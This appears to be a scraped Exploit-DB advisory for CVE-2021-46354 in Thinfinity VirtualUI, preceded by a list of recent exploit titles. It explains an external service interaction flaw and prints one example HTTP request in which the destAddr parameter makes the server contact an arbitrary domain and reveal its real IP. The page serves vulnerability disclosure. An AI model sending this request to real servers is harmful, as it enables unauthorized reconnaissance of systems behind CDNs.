
12 changes to exploits/shellcodes HMA VPN 5.3 - Unquoted Service Path Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) Cab Management System 1.0 - 'id' SQLi (Authenticated) Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated) Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated) Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection Thinfinity VirtualUI 2.5.26.2 - Information Disclosure WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated) FileCloud 21.2 - Cross-Site Request Forgery (CSRF) Dbltek GoIP - Local File Inclusion
28 lines
No EOL
1.6 KiB
Text
28 lines
No EOL
1.6 KiB
Text
Exploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure
|
|
Date: 18/01/2022
|
|
Exploit Author: Daniel Morales
|
|
Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/>
|
|
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/>
|
|
Version vulnerable: Thinfinity VirtualUI < v2.5.26.2
|
|
Tested on: Microsoft Windows
|
|
CVE: CVE-2021-46354
|
|
|
|
How it works
|
|
External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN).
|
|
|
|
Payload
|
|
An example of the HTTP request "https://example.com/cmd <https://example.com/cmd>?
|
|
cmd=connect&wscompression=true&destAddr=domain.com <http://domain.com/>
|
|
&scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191
|
|
8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp
|
|
ortsFullScreen=true&webapp=false”
|
|
|
|
Where "domain.com <http://domain.com/>" is the external endpoint to be requested.
|
|
|
|
Vulnerable versions
|
|
It has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2
|
|
|
|
References
|
|
https://github.com/cybelesoft/virtualui/issues/3 <https://github.com/cybelesoft/virtualui/issues/3>
|
|
https://www.tenable.com/cve/CVE-2021-46354 <https://www.tenable.com/cve/CVE-2021-46354>
|
|
https://twitter.com/danielmofer <https://twitter.com/danielmofer> |